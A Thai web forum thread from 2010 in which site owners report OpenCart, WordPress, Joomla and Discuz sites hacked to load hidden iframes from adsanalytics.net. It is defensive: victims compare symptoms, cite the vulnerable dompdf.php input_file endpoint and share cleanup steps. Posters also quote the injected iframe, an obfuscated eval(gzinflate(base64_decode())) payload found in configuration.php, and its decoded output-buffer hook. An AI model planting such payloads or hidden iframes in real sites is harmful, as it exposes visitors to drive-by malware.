ระวังร้าน OpenCart ของท่าน โดนแฮ็ค ( stein.cz.cc , adsanalytics.net )

ohmohm · 13 เมษายน 2010, 00:20:47

เข้าไปดูของตัวเอง พอจะคลิ๊กสินค้า เจอ dialog เตือนจาก stein.cz.cc ทำนองว่า browser เก่าไป

พอไปดู conf.php ของตัวเอง ด้วย ftp พบว่า modified date เป็นเมื่อวาน ซึ่งไม่น่าเป็นไปได้ get มาดู ก็เจอ

โค้ด เลือก

$INJ = '<iframe width=0 height=0 style='display:none' src="http://adsanalytics.net/in.cgi?2"></iframe>';

พอเอา คำว่า adsanalytics.net ไปค้น เจอเลยครับ
http://forum.opencart.com/viewtopic.php?f=20&t=13276

มันโจมตี ผ่าน system/helper/dompdf/dompdf.php
มันพึ่งโจมตี วันที่ 11 ก็คือเมื่อไม่กี่วันนี้เองครับ เลยมีออก v1.4.7 มาแก้ทันทีกันเลยครับ

PornClip · 13 เมษายน 2010, 00:25:05

งานเข้าแล้ว OpenCart

ohmohm · 13 เมษายน 2010, 00:45:40

ของผมมัน version เก่าด้วยอะครับ แต่มันพึ่งคุกคามมาไม่กี่วัน แล้วตัวแก้ก็มาเกือบจะทันที
v1.4.7 วันที่ 11 เมษายน http://forum.opencart.com/viewtopic.php?f=2&t=13216
v1.4.6 update วันที่ 3 เมษายน http://forum.opencart.com/viewtopic.php?f=2&t=12925

andiklin · 13 เมษายน 2010, 00:54:18

ขอบคุณที่มาเตือนครับ เดี๋ยวต้องไปดูของตัวเองแล้วครับ

Halogen · 13 เมษายน 2010, 01:49:40

เลิกใช้ไปแล้วครับ

vii · 15 เมษายน 2010, 08:49:49

โดนเต็มๆซะแล้วสำหรับ e-commerce ไอ้ตัวเล็กตัวนี้.. ก็อัปเดทแก้กันไป
ตอนนี้พวกสคริป shopping cart ฟรีมีหลายตัวแต่ที่เวิร์คจริงมันน้อยเหลือเกิน
magento ก็ดีแต่ใหญ่และอืดมาก ต้องเล่นระดับ vps
prestashop ตัวใหม่แค่ติดตั้งแล้วลองสั่งซื้อ เอ่อ.. order creation failed เอาตรงขั้นตอนสุดท้าย
opencart ก็น่าจะดี...
oscommerce ...เก่ามาก..

moneylicker · 18 เมษายน 2010, 09:39:31

ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ

ohmohm · 18 เมษายน 2010, 16:39:17

มันคง inject มาทาง /artshop/upload/system/helper/dompdf/dompdf.php?input_file= ( http://forum.opencart.com/viewtopic.php?f=20&t=13212 ) ละครับ ลบไฟล์นี้ออก ก็น่าจะปลอดภัย

อ้างถึงจาก: moneylicker ใน 18 เมษายน 2010, 09:39:31
ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ

ใช้ wp version ไหนฮะ

โกโลโกโส · 18 เมษายน 2010, 17:08:05

ผมใช้ wp 2.9.1 ก็โดนเหมือนกันครับแก้ยังไงตรงไหน ท่านใดรู้ช่วยบอกผมที - -"

HotelBestBuy · 18 เมษายน 2010, 17:13:05

joomla บางเวบที่ทำเพิ่งโดนตัวนี้เข้าไปครับ
ยังไม่ทันได้ไล่ดูละเอียด แต่รู้สึกว่าอาจเกียวกับ url redirect ในเวบด้วย -_-'

mama2008 · 18 เมษายน 2010, 17:44:11

wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ

mama2008 · 18 เมษายน 2010, 17:52:09

คราวก่อนโดน iframe มันไปฝั่งไว้ใน เทมเพลตเปลี่ยนเทมเพลตก็หาย คราวนี้พอเปลี่ยน เทมเพลต เว็บหายเลยพี่น้อง ใครโดนระวังหน่อยนะครับ

โกโลโกโส · 18 เมษายน 2010, 17:56:40

อ้างถึงจาก: mama2008 ใน 18 เมษายน 2010, 17:44:11
wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ

แก้ได้แจ้งด้วยนะครับ ผมหาอยู่แต่ยังไม่เจอ (ทำไม่เป็นด้วยครับ อิอิ)

xinexo · 18 เมษายน 2010, 17:57:32

ใครใช้รีบอัพด่วนนะครับ

mama2008 · 18 เมษายน 2010, 18:41:44

wp ใครโดนบ้างครับ ยังหาทางแก้ไม่ได้เลย

โกโลโกโส · 18 เมษายน 2010, 18:44:02

^
^
^
ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ

โชคดีนะครับ

mama2008 · 18 เมษายน 2010, 18:52:17

อ้างถึงจาก: โกโลโกโส ใน 18 เมษายน 2010, 18:44:02
^
^
^
ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ

โชคดีนะครับ

ลงใหม่!!!!!!!!!!
และข้อมูลเก่าละครับ ลงใหม่นี่หมายถึงเอามาทับอันเดิมใช่ไหมครับ หรือว่าลบทำใหม่เลย

โกโลโกโส · 18 เมษายน 2010, 19:03:41

ผมลบแล้วลงใหม่นะครับ ทำแบบบ้านๆเลย เอิ๊กๆ

ผมลบ wp ตัวเก่าออกหมด เก็บแค่ theme plugin ไฟล์ที่อัพโหลด ไฟล์wp-config ไว้ก่อน ส่วนDBผมไม่ได้ลบนะครับ
แล้วก็อัพ wp ตัวใหม่ขึ้นไป แล้วก็เอาไฟล์ที่แบ็คอัพไว้ทั้งหมดอัพขึ้นไปไว้ตำแหน่งเดิม

**ที่จริงผมว่าอัพทับมันก็น่าจะได้นะครับ

mama2008 · 18 เมษายน 2010, 19:08:21

ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ

โกโลโกโส · 18 เมษายน 2010, 19:09:59

อ้างถึงจาก: mama2008 ใน 18 เมษายน 2010, 19:08:21
ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ

ถ้ารู้วิธีบอกผมด้วยนะครับ ^ ^

กระเทยหัวล้าน · 18 เมษายน 2010, 21:17:29

http://www.siamopencart.com/webboard/index.php/topic,365.0.html

รู้กันนานมากแล้วใน เว็บบอร์ดค่ะ!

iamway · 18 เมษายน 2010, 21:41:59

ผมโดนใน Joomla ครับ ไม่ได้ใช้ E-commerce ด้วย เป็นแค่เว็บคอนเทนต์ธรรมดา ไฟล์ Configuration.php โดนใส่ข้อความแบบนี้ครับ

eval(gzinflate(base64_decode('BcHbtkJAAADQz6mWB7og6zw5iFEpmYl6OWtcG6ZB4xJff/bOBkyXxUxYTnGXLWPMM2X3l2ZJnWbLxW/iuEkNRl03/Xlt2/pETg9Ya9S6VyZEvWRxpyrMGzHAg1Ax15SiFmJX5or6lhGJ7pD6SNzTg7d3o0A1Hh PaRuIM8bpVhduhAMURkCsWvKZnkbq76Ze5rwGL0bNKg8N098cBTXWxiYm9iEQk mtC59BWYY8hsTfNGwvpk9w36AsOGf3MMv bz1ztX2xGJPbXEwqU7rjC4KsQq4f3CrPI4unt6yuSOx2bzR7HXKyEF0TV8OLda MA1CGEhiWz/R3AXlSJvh L0UqFEG9H1YTTV2ON VJ3W81QlmjXbtPGxI0N6c2z0amHtPi vFFE7hMSt1WToGDdDExWq1 vkH')));/*^_^*/

ค้นในเน็ต มีคนเขาสอนถอดรหัส พอเอาไปถอดรหัสดู ก็เห็นเป็นคำสั่งแบบนี้ครับ

if(!defined('OBH')){define('OBH',1);function obh($b){return preg_replace('@<[ ]*/[ ]*html>@i', "$0n<iframe width=0 height=0 style="display:none" src="http://adsanalytics.net/in.cgi?3"></iframe>", $b);};ob_start('obh');}

ใครมีความรู้เรื่องภาษา php ช่วยแกะให้หน่อยครับว่ามันทำอะไรกับเว็บเราไปบ้าง

ขอบคุณครับ

mama2008 · 18 เมษายน 2010, 22:49:20

และ wp ใครรู้มั่งว่าต้องแก้ตรงไหนครับ ในเทมเพลตก็ไม่มี ในไฟล์ ของ wp ก็ไม่มีลองโหลดมาอัพทับไปหมดแล้ว เหลืออย่างเดียวว่าเค้าเอาไฟล์ .php มาเก็บที่ไหน

pramecomix · 19 เมษายน 2010, 14:50:55

ของผมติด adsanalytics.net เหมือนกัน ครับ

อ้างถึง<iframe width=0 height=0 style="display:none" src="http://adsanalytics.net/in.cgi?3 "></iframe>

ใช้บอร์ด discuz 6.1F

ตอนนี้แก้ไขได้แล้วครับ มึนมาหลายวันเลยทีเดียว

แก้โดยลบไฟล์ .htaccess ใน htdocs (ใช้ vhcs)
ลองดาวโหลด .htaccess มาดูนะครับ แล้วลองเลื่อนไปดูไฟล์ทั้งหมด มันแอบซ่อนอยู่

ขอบคุณ ibiznetwork.com // appservhostiing.com// คุณยิ่ง KMUTT //FordAntitrust
ที่มาช่วยกันหาสาเหตุครับ